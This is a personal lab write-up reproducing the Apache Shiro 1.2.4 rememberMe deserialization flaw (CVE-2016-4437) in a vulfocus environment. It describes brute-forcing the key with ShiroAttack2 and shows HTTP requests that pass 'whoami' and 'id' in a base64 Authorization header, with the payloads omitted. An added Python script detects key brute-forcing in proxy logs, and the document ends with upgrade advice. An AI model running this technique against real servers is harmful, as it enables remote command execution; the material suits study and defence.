Apache Shiro 1.2.4 deserialization vulnerability attack, CVE-2016-4437 (reproduced personally)

Vulnerability name

Vulnerability description

In Apache Shiro before 1.2.5, when no cipher key has been configured for the "remember me" feature, a remote attacker can execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.
Affected versions
Apache Shiro 1.2.4
Vulnerability reproduction

Environment setup
Victim IP: 127.0.0.1; attacker IP: 8.140.54.167:40201
vulfocus download link:
https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git
Start vulfocus:
docker-compose up -d
After the environment starts, visiting http://8.140.54.167:40201/ shows a login page, which means it started successfully.

Exploitation
Tool download link:
https://github.com/SummerSec/ShiroAttack2/releases/tag/4.7.0
Use the tool: enter the target, brute-force the key and detect the usable gadget chain.
Execute the system command whoami. I looked through several tools but could not find one that generates the rememberMe payload, so I started Wireshark. Try it with Burp: paste the payload in, execute whoami and judge the result from the echo.
GET / HTTP/1.1
Host: 8.140.54.167:34023
Cookie: JSESSIONID=5537D28072A8ECF54A54B3A245596A12; rememberMe=<encrypted rememberMe payload, several KB of base64, omitted>
Authorization: Basic d2hvYW1p
Connection: close

The response content is as follows. After base64 decoding it gives the command output, so it is enough to replace the base64-encoded Authorization field and read the result directly from the echo.
$$$cm9vdAo$$$ decodes from base64 to:
root

Below are tests of two separate cases: first, what is returned if the wrong key is used; second, what is returned when the key is right but execution fails on a higher version.
Case 1: try with the correct key, then with a wrong key. With the correct key the response contains both Set-Cookie: JSESSIONID and Set-Cookie: rememberMe=deleteMe; the status code is 200.
With a wrong key the response contains Set-Cookie: rememberMe=deleteMe but no Set-Cookie: JSESSIONID; the status code is 200.
Case 2: what is returned when the key is right but execution fails on a higher version
Here vulfocus is used to start the shiro-721 environment for testing; it also has rememberMe deserialization, but the affected versions are 1.2.5, 1.2.6, 1.3.0, 1.3.1, 1.3.2, 1.4.0-RC2, 1.4.0 and 1.4.1, so it serves as the higher-version test. Capture a request with Burp and decode the original rememberMe. Brute-force the shiro-721 key, gadget chain and echo method. The payload differs from the vulnerability above in that it is sent with a POST request:
POST / HTTP/1.1
Cookie: <rememberMe payload omitted>
Authorization: Basic aWQ
Cookie: JSESSIONID=2a7f4e5f-1ff3-4a07-bbdd-605ea0715807
Host: 8.140.54.167:57748
Content-Length: 2

At this point the approach is wrong: to find out what is returned when the key is right but a higher version does not execute the payload, I need an environment that is not vulnerable, so keep going. Here I found a shiro-cve_2020_13933 environment to verify with. Using the correct key against a higher version that does not have the vulnerability only returns Set-Cookie: rememberMe=deleteMe and no Set-Cookie: JSESSIONID.
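As an added example (not from the original post or the ShiroAttack2 project), this Python script turns the Set-Cookie observations above into server-side detection logic over constructed proxy log lines: a run of rememberMe=deleteMe-only responses from one client is what key brute-forcing looks like to the defender, and a response that sets both JSESSIONID and deleteMe for an oversized rememberMe cookie is what a decrypted but rejected payload looks like. The log format, field names, IPs and thresholds are assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed sample log (not from the original post). Assumed reverse-proxy format: client IP,
# request line, byte length of the rememberMe cookie sent, and the Set-Cookie header(s) returned.
SAMPLE_LOG = """\
198.51.100.7 "GET / HTTP/1.1" rememberMe_len=148 set_cookie="JSESSIONID=A1; Path=/"
192.0.2.9 "GET / HTTP/1.1" rememberMe_len=160 set_cookie="rememberMe=deleteMe; Path=/; Max-Age=0"
203.0.113.5 "GET / HTTP/1.1" rememberMe_len=3072 set_cookie="rememberMe=deleteMe; Path=/; Max-Age=0"
203.0.113.5 "GET / HTTP/1.1" rememberMe_len=3072 set_cookie="rememberMe=deleteMe; Path=/; Max-Age=0"
203.0.113.5 "GET / HTTP/1.1" rememberMe_len=3072 set_cookie="rememberMe=deleteMe; Path=/; Max-Age=0"
203.0.113.5 "GET / HTTP/1.1" rememberMe_len=3072 set_cookie="JSESSIONID=B2; Path=/, rememberMe=deleteMe; Path=/"
"""
LINE_RE = re.compile(r'^(?P<ip>\S+) "[^"]*" rememberMe_len=(?P<rlen>\d+) set_cookie="(?P<sc>[^"]*)"$')

def classify(rlen, set_cookie):
    """Map one response to the Set-Cookie behaviour the write-up observed on Shiro."""
    if rlen == 0 or "rememberMe=deleteMe" not in set_cookie:
        return None  # no rememberMe cookie sent, or Shiro accepted it: nothing suspicious
    # deleteMe alone: wrong key (or a patched version) rejected the cookie outright.
    # deleteMe plus a new JSESSIONID: key accepted, bytes deserialized, object then discarded.
    return "object_rejected" if "JSESSIONID=" in set_cookie else "decode_failed"

def count_signals(log_text, max_cookie_len=1024):
    """Per client IP, count signal kinds; max_cookie_len is an assumed bound for a genuine cookie."""
    per_ip = defaultdict(Counter)
    for m in filter(None, map(LINE_RE.match, log_text.splitlines())):
        rlen = int(m["rlen"])
        kind = classify(rlen, m["sc"])
        if kind:
            per_ip[m["ip"]][kind] += 1
        if rlen > max_cookie_len:
            per_ip[m["ip"]]["oversized"] += 1
    return per_ip

def analyze(log_text, fail_threshold=3, max_cookie_len=1024):
    """Return {ip: [reasons]} for clients whose rememberMe traffic looks like a key brute-force or payload probe."""
    findings = {}
    for ip, c in count_signals(log_text, max_cookie_len).items():
        reasons = []
        if c["object_rejected"]:
            reasons.append("rememberMe decrypted but object rejected: possible deserialization payload")
        if c["decode_failed"] >= fail_threshold:
            reasons.append(f"{c['decode_failed']} rememberMe decode failures: possible key brute-force")
        if c["oversized"]:
            reasons.append(f"{c['oversized']} rememberMe cookies over {max_cookie_len} bytes")
        if reasons:
            findings[ip] = reasons
    return findings
```

A single decode failure (192.0.2.9 in the sample) is normal after a key rotation or cookie expiry, which is why only the repeated failures and the oversized cookies are reported.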
Fix recommendations
1. Patch for multiple Apache Shiro security vulnerabilities: upgrade to the latest version (the linked release is 1.12.0): https://github.com/apache/shiro/releases/tag/shiro-root-1.12.0
Summary